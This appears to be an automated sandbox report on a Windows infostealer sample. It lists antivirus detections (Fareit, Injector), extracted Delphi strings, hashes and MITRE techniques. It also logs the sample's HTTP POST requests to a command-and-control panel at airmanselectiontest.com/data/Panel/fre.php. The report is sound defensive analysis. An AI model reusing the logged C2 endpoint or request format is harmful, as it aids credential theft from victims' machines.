Not enough timers [email protected] cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active*A control cannot have itself as its parent
Cancel
&Help
&Close
&Ignore
&Retry
Abort
Out of system resources
Canvas does not allow drawing
Invalid image size
Invalid ImageList
Unable to Replace Image
Invalid ImageList Index)Failed to read ImageList data from stream(Failed to write ImageList data to stream$Error creating window device context
Error creating window class+Cannot focus a disabled or invisible window!Control '%s' has no parent window
Cannot hide an MDI Child Form)Cannot change Visible in OnShow or OnHide"Cannot make a visible window modal
Menu index out of range
Error reading %s%s%s: %s
Stream read error
Property is read-only
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Stream write error
Bitmap image is not valid
Icon image is not valid
Metafile is not valid
Invalid image!Cannot change the size of an icon$Unknown picture file extension (.%s)
Unsupported clipboard format
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid property value
Invalid property path
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
January
February
March
April
August
September
October
November
December
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
A call to an OS function failed
)Variant or safe array index out of bounds
Variant or safe array is locked
Invalid variant type conversion
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Variant overflow
Invalid argument
Invalid variant type
Operation not supported
Unexpected variant error
External exception %x
Assertion failed
Interface not supported
Exception in safecall method
Floating point underflow
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Access violation
Stack overflow
Control-C hit
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Write$Error creating variant or safe array
!'%s' is not a valid integer value
Out of memory
I/O error %d
File not found
Invalid filename
Too many open files
File access denied
Read beyond end of file
Disk full
Invalid numeric input
Division by zero
Range check error
Integer overflow Invalid floating point operation
Floating point division by zero
Floating point overflow

Full Results

Engine Signature Engine Signature Engine Signature
Bkav W32.AIDetectVM.malwareB DrWeb Clean MicroWorld-eScan Clean
FireEye Generic.mg.325216037ccc1b94 CAT-QuickHeal Clean ALYac Clean
Cylance Clean Zillya Clean SUPERAntiSpyware Clean
Sangfor Clean K7AntiVirus Trojan ( 005680341 ) Alibaba Clean
K7GW Trojan ( 005680341 ) Cybereason malicious.be1a20 Arcabit Clean
Invincea heuristic BitDefenderTheta Gen:[email protected] F-Prot W32/Injector.ABY.gen!Eldorado
Symantec ML.Attribute.HighConfidence ESET-NOD32 a variant of Win32/Injector.EMJE Zoner Clean
TrendMicro-HouseCall Clean TotalDefense Clean Paloalto generic.ml
ClamAV Clean Kaspersky UDS:DangerousObject.Multi.Generic BitDefender Clean
NANO-Antivirus Clean AegisLab Clean Avast Clean
Rising Trojan.Injector!1.AFE3 (CLOUD) Ad-Aware Clean Emsisoft Clean
Comodo Clean F-Secure Clean Baidu Clean
VIPRE Clean TrendMicro Clean Fortinet W32/Injector.ELZG!tr
Trapmine suspicious.low.ml.score CMC Clean Sophos Clean
SentinelOne DFI - Suspicious PE Cyren W32/Injector.ABY.gen!Eldorado Jiangmin Clean
eGambit Clean Avira Clean MAX Clean
Antiy-AVL Clean Kingsoft Clean Endgame malicious (high confidence)
Microsoft Trojan:Win32/Wacatac.C!ml ViRobot Clean ZoneAlarm UDS:DangerousObject.Multi.Generic
Avast-Mobile Clean Cynet Malicious (score: 100) AhnLab-V3 Suspicious/Win.Delphiless.X2066
Acronis suspicious McAfee Fareit-FTB!325216037CCC TACHYON Clean
VBA32 Clean Malwarebytes Clean APEX Malicious
Tencent Win32.Backdoor.Fareit.Auto Yandex Clean Ikarus Clean
MaxSecure Trojan.Malware.300983.susgen GData Clean Webroot Clean
AVG Clean Panda Clean CrowdStrike win/malicious_confidence_90% (D)
Qihoo-360 HEUR/QVM05.1.16F3.Malware.Gen
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 51.105.208.173 [VT] United Kingdom
Y 13.107.42.23 [VT] United States
N 103.129.98.18 [VT] unknown

TCP

Source Source Port Destination Destination Port
192.168.1.7 49190 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49192 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49193 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49194 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49195 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49196 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49198 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49201 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49202 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49203 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49204 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49205 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49206 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49207 103.129.98.18 airmanselectiontest.com 80
192.168.1.7 49177 13.107.42.23 443
192.168.1.7 49179 13.107.42.23 443
192.168.1.7 49199 205.185.216.10 80
192.168.1.7 6320 52.114.36.4 22628
192.168.1.7 49197 52.114.36.4 443

UDP

Source Source Port Destination Destination Port
192.168.1.7 137 192.168.1.255 137
192.168.1.7 55169 8.8.8.8 53
192.168.1.7 56221 8.8.8.8 53
192.168.1.7 57251 8.8.8.8 53
192.168.1.7 59810 8.8.8.8 53
192.168.1.7 61313 8.8.8.8 53
192.168.1.7 62371 8.8.8.8 53
192.168.1.7 64247 8.8.8.8 53
192.168.1.7 65119 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
airmanselectiontest.com [VT] A 103.129.98.18 [VT] 103.129.98.18 [VT]

HTTP Requests

URI Data
http://airmanselectiontest.com/data/Panel/fre.php
POST /data/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: airmanselectiontest.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E47034EA
Content-Length: 186
Connection: close

http://airmanselectiontest.com/data/Panel/fre.php
POST /data/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: airmanselectiontest.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E47034EA
Content-Length: 159
Connection: close

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.7 49176 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49177 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49178 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49179 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49180 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49197 52.114.36.4 443 d124ae14809abde3528a479fe01a12bd unknown
Sorry! No dropped files.
Sorry! No CAPE files.
Process Name gunzipped.exe
PID 4492
Dump Size 657408 bytes
Module Path C:\Users\Louise\AppData\Local\Temp\gunzipped.exe
Type PE image: 32-bit executable
PE timestamp 1992-06-19 22:22:17
MD5 a87d1a75826d317117ce0d3be5ed9fde
SHA1 2a2c525f2d2db8bee0723ff468c0b3ff12a83529
SHA256 987a5d271b712a0514cfc3158f7fcbc63d48d1b4c72e8a77e4f9c764c2bd56d4
CRC32 3F8743F0
Ssdeep 12288:8DRuXrEbb00e9ElcwOixtthKGc7WR5Sc7YyHOqIZQfkBzWTBzVvJl:+YbQhe9RKthmg5AYUekBzWTTJ
Dump Filename 987a5d271b712a0514cfc3158f7fcbc63d48d1b4c72e8a77e4f9c764c2bd56d4
Download Download Zip
Process Name services.exe
PID 472
Dump Size 327680 bytes
Module Path C:\Windows\sysnative\services.exe
Type PE image: 64-bit executable
PE timestamp 2015-04-13 02:02:59
MD5 b2a83b96596e59966090372da5f477d2
SHA1 654dadf0924f35d30413fe59222d5c0b0a162f08
SHA256 191999bdb88664b01039d897d1fd8a96ea9e3eae9bd7444d9ab7b61889edd18b
CRC32 CF057FED
Ssdeep 6144:xX+dGqMuImU4Zkt8kjM7vFLFb/2JBH4EtLcN8ZE21uFLLI6m:xX+dGluImU4s8m/zMFI
Dump Filename 191999bdb88664b01039d897d1fd8a96ea9e3eae9bd7444d9ab7b61889edd18b
Download Download Zip
Defense Evasion Credential Access Collection Privilege Escalation
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess
  • T1045 - Software Packing
    • Signature - packer_unknown_pe_section_name
  • T1003 - Credential Dumping
    • Signature - infostealer_browser
  • T1081 - Credentials in Files
    • Signature - infostealer_browser
  • T1005 - Data from Local System
    • Signature - infostealer_browser
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 3.9290000000000003 seconds )

    • 1.495 Static
    • 0.875 NetworkAnalysis
    • 0.722 BehaviorAnalysis
    • 0.28 VirusTotal
    • 0.263 CAPE
    • 0.098 ProcDump
    • 0.063 TargetInfo
    • 0.056 Dropped
    • 0.029 Deduplicate
    • 0.018 AnalysisInfo
    • 0.017 Strings
    • 0.007 peid
    • 0.005 Debug
    • 0.001 Suricata

    Signatures ( 0.7670000000000005 seconds )

    • 0.094 antiav_detectreg
    • 0.048 masquerade_process_name
    • 0.045 infostealer_ftp
    • 0.04 antiav_detectfile
    • 0.032 territorial_disputes_sigs
    • 0.026 infostealer_im
    • 0.025 infostealer_bitcoin
    • 0.023 antivm_vbox_libs
    • 0.02 antianalysis_detectfile
    • 0.019 api_spamming
    • 0.019 antianalysis_detectreg
    • 0.017 decoy_document
    • 0.017 exec_crash
    • 0.016 antivm_vbox_files
    • 0.013 NewtWire Behavior
    • 0.012 infostealer_mail
    • 0.012 ransomware_files
    • 0.011 Doppelganging
    • 0.011 predatorthethief_files
    • 0.011 qulab_files
    • 0.01 antiav_avast_libs
    • 0.01 antivm_vbox_keys
    • 0.008 ransomware_extensions
    • 0.007 antivm_vmware_keys
    • 0.006 InjectionCreateRemoteThread
    • 0.006 exploit_getbasekerneladdress
    • 0.006 exploit_gethaldispatchtable
    • 0.006 injection_createremotethread
    • 0.006 stealth_timeout
    • 0.006 antidbg_devices
    • 0.006 antivm_vmware_files
    • 0.006 geodo_banking_trojan
    • 0.005 antivm_generic_disk
    • 0.005 antivm_parallels_keys
    • 0.005 antivm_xen_keys
    • 0.004 antiav_bitdefender_libs
    • 0.004 antiav_bullgaurd_libs
    • 0.004 antiav_emsisoft_libs
    • 0.004 antiav_qurb_libs
    • 0.004 antiav_apioverride_libs
    • 0.004 antiav_nthookengine_libs
    • 0.004 antisandbox_sboxie_libs
    • 0.004 antisandbox_sunbelt_libs
    • 0.004 antivm_vmware_libs
    • 0.004 betabot_behavior
    • 0.004 kibex_behavior
    • 0.004 network_tor
    • 0.004 shifu_behavior
    • 0.003 InjectionInterProcess
    • 0.003 antidebug_guardpages
    • 0.003 dynamic_function_loading
    • 0.003 exploit_heapspray
    • 0.003 hawkeye_behavior
    • 0.003 injection_runpe
    • 0.003 kazybot_behavior
    • 0.003 malicious_dynamic_function_loading
    • 0.003 mimics_filetime
    • 0.003 persistence_autorun
    • 0.003 reads_self
    • 0.003 virus
    • 0.003 antivm_generic_diskreg
    • 0.003 antivm_vbox_devices
    • 0.003 antivm_vpc_keys
    • 0.003 codelux_behavior
    • 0.002 InjectionProcessHollowing
    • 0.002 bootkit
    • 0.002 regsvr32_squiblydoo_dll_load
    • 0.002 encrypted_ioc
    • 0.002 hancitor_behavior
    • 0.002 infostealer_browser
    • 0.002 stealth_file
    • 0.002 network_cnc_http
    • 0.002 network_torgateway
    • 0.002 obliquerat_files
    • 0.002 rat_pcclient
    • 0.002 sniffer_winpcap
    • 0.001 InjectionSetWindowLong
    • 0.001 antiemu_wine_func
    • 0.001 antivm_generic_scsi
    • 0.001 dridex_behavior
    • 0.001 infostealer_browser_password
    • 0.001 stack_pivot
    • 0.001 tinba_behavior
    • 0.001 antisandbox_cuckoo_files
    • 0.001 antisandbox_fortinet_files
    • 0.001 antisandbox_joe_anubis_files
    • 0.001 antisandbox_sunbelt_files
    • 0.001 antisandbox_threattrack_files
    • 0.001 antivm_xen_keys
    • 0.001 antivm_generic_bios
    • 0.001 antivm_generic_system
    • 0.001 antivm_hyperv_keys
    • 0.001 antivm_vpc_files
    • 0.001 ketrican_regkeys
    • 0.001 banker_cridex
    • 0.001 browser_security
    • 0.001 bypass_firewall
    • 0.001 darkcomet_regkeys
    • 0.001 disables_browser_warn
    • 0.001 network_dns_opennic
    • 0.001 network_tor_service
    • 0.001 revil_mutexes
    • 0.001 dcrat_files
    • 0.001 limerat_regkeys
    • 0.001 warzonerat_files
    • 0.001 warzonerat_regkeys
    • 0.001 recon_fingerprint
    • 0.001 remcos_files
    • 0.001 remcos_regkeys
    • 0.001 targeted_flame

    Reporting ( 7.952999999999999 seconds )

    • 7.888 BinGraph
    • 0.042 MITRE_TTPS
    • 0.023 PCAP2CERT